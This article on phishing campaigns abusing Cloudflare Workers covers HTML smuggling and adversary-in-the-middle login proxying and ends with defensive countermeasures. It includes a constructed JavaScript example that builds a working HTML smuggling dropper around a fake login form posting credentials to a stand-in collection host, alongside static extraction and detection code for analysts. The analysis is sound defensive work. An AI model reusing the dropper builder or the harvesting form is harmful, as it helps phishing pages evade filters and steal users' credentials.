Cloudflare Workers, Cloudflare's serverless hosting platform, has become the latest cloud service to be abused by phishing campaigns, which rely on two main tactics. One delivers the phishing page by HTML smuggling, hiding the payload inside an innocuous-looking HTML file in much the same way Azorult malware droppers have done; the other runs a Worker as a transparent proxy in front of the genuine login pages of services such as Microsoft, Gmail and Yahoo Mail to capture credentials and session material. Victims are mostly in Asia, North America and Southern Europe, with the technology, finance and banking sectors hit hardest.
The steadily growing number of Workers applications and domains involved shows attackers rotating infrastructure to outlast detection and takedowns. It continues a well-established pattern of abusing free tiers of major cloud services for phishing: a workers.dev hostname comes with a valid TLS certificate and the reputation of a platform that few organizations are willing to block outright, which is exactly what makes well-known providers such as Cloudflare attractive.
The most basic technique is simply hosting the phishing site on Cloudflare Workers. A free account lets an attacker deploy a custom application under a hostname of the form <name>.<account>.workers.dev and serve it to anyone at no cost. Although total traffic to these pages has levelled off, the number of distinct malicious Workers applications keeps rising, a sign that attackers are spinning up new ones as old ones are taken down.
HTML smuggling is the second method, used to carry the phishing page past network defenses such as secure web gateways and mail filters. The phishing page itself is embedded in a seemingly harmless web page as a base64-encoded string, often wrapped in further layers of encoding, so inspection at the network boundary sees only the benign outer page. Once the page runs in the victim's browser, its JavaScript decodes the string into a Blob, turns it into a URL with createObjectURL(), and simulates a click on that URL, so the phishing page is rendered from a blob: address entirely on the endpoint, without the phishing HTML ever crossing the network in the clear.
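The following is an added example written for this page, not code from the Netskope report or from the campaign. It shows how an HTML smuggling dropper of the kind just described is assembled (base64 payload, extra encoding layer, Blob, createObjectURL(), simulated click) and how an analyst can unwrap it statically without executing the page. It runs under Node.js. The inner page, the hostnames and the particular layering (base64 of a reversed base64 string) are all constructed for the example; real kits vary in their encodings.

```javascript
// Added example (not code from the Netskope report or from the campaign):
// assemble an HTML smuggling dropper and unwrap it statically. Node.js, no deps.

// Constructed sample inner page, not a real phishing kit.
const SAMPLE_PHISHING_PAGE = [
  '<html><body><form action="https://example.invalid/collect" method="post">',
  '<input name="user"><input name="password" type="password">',
  '<button>Sign in</button></form></body></html>',
].join('\n');

// Layer 1: base64 the page. Layer 2: reverse the string. Layer 3: base64 again.
// (An assumed stand-in for "multiple encodings"; the real scheme differs.)
function wrapPayload(html) {
  const inner = Buffer.from(html, 'utf8').toString('base64');
  const reversed = inner.split('').reverse().join('');
  return Buffer.from(reversed, 'utf8').toString('base64');
}

// Inverse of wrapPayload, used by the analyst rather than the browser.
function unwrapPayload(blob) {
  const reversed = Buffer.from(blob, 'base64').toString('utf8');
  const inner = reversed.split('').reverse().join('');
  return Buffer.from(inner, 'base64').toString('utf8');
}

// The dropper. A scanner sees an empty page and one opaque string; the browser
// decodes it, wraps the bytes in a Blob, and "clicks" an anchor pointing at the
// blob: URL, which renders the phishing page: the createObjectURL() flow above.
function buildDropper(html) {
  const blob = wrapPayload(html);
  return [
    '<!doctype html><html><body><script>',
    'var p = "' + blob + '";',
    'var r = atob(p).split("").reverse().join("");',
    'var bytes = Uint8Array.from(atob(r), function (c) { return c.charCodeAt(0); });',
    'var b = new Blob([bytes], { type: "text/html" });',
    'var a = document.createElement("a");',
    'a.href = URL.createObjectURL(b);',
    'document.body.appendChild(a);',
    'a.click();',
    '</script></body></html>',
  ].join('\n');
}

// Analyst side: pull the quoted blob out of the dropper and unwrap it offline,
// so the inner page (form action, lure text) can be examined without rendering.
function extractSmuggledPage(dropperHtml) {
  const m = dropperHtml.match(/var p = "([A-Za-z0-9+\/=]+)";/);
  return m ? unwrapPayload(m[1]) : null;
}

// Cheap triage signal for the technique: in-browser decoding, an object URL,
// and a synthetic click all in one page.
function looksLikeHtmlSmuggling(html) {
  return /atob\(/.test(html) && /URL\.createObjectURL\(/.test(html) && /\.click\(\)/.test(html);
}
```

The triage check is deliberately simple: real droppers rename variables and split or reorder the decoding steps, so it is a starting signal for sandboxing or manual review, not a detection on its own. The useful defensive point is the extraction step: because every layer is reversible, an analyst can recover the smuggled page and its form action (the credential collection endpoint) from the file alone.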
The third tactic is transparent phishing, also known as adversary-in-the-middle phishing. Instead of hosting a static copy of a login page, the attacker runs a server that sits between the victim and the legitimate login page and relays traffic in both directions. The victim sees the real page, served live through the proxy, but every request, including the username, password and any MFA code entered, passes through the attacker's server on its way to the legitimate service. Responses come back the same way, so the attacker also captures the tokens and session cookies the legitimate site issues once login succeeds. That is what makes the technique effective against MFA methods that are not phishing-resistant: the attacker never needs the password again, only the session, and can watch or take over the victim's subsequent activity on the service.
Researchers at Netskope, who analyzed these attacks, found that they are built on modified open-source adversary-in-the-middle toolkits and started from the Cloudflare Workers "Hello World" template, repurposed to intercept the victim's requests. The resulting Worker acts as a transparent proxy, forwarding and rewriting traffic between the victim and the legitimate site while recording login credentials and other sensitive data as they pass through.
In conclusion, the abuse of Cloudflare Workers in phishing campaigns is a serious threat, particularly to the technology, finance and banking sectors. By building on a trusted platform's own features, attackers get credible hostnames, valid certificates and free hosting, and the transparent-proxy variant defeats MFA methods that rely on codes the victim types in. Practical countermeasures follow from how the attacks work: deploy phishing-resistant MFA such as FIDO2/WebAuthn, whose credentials are bound to the genuine origin and therefore cannot be relayed through a proxy; treat unexpected workers.dev hostnames as suspicious in web proxies and mail filters rather than trusting them by association with Cloudflare; inspect HTML attachments and pages for in-browser decoding, object URLs and synthetic clicks characteristic of HTML smuggling; and monitor for logins whose session was issued to an unfamiliar client shortly after a visit to such a hostname.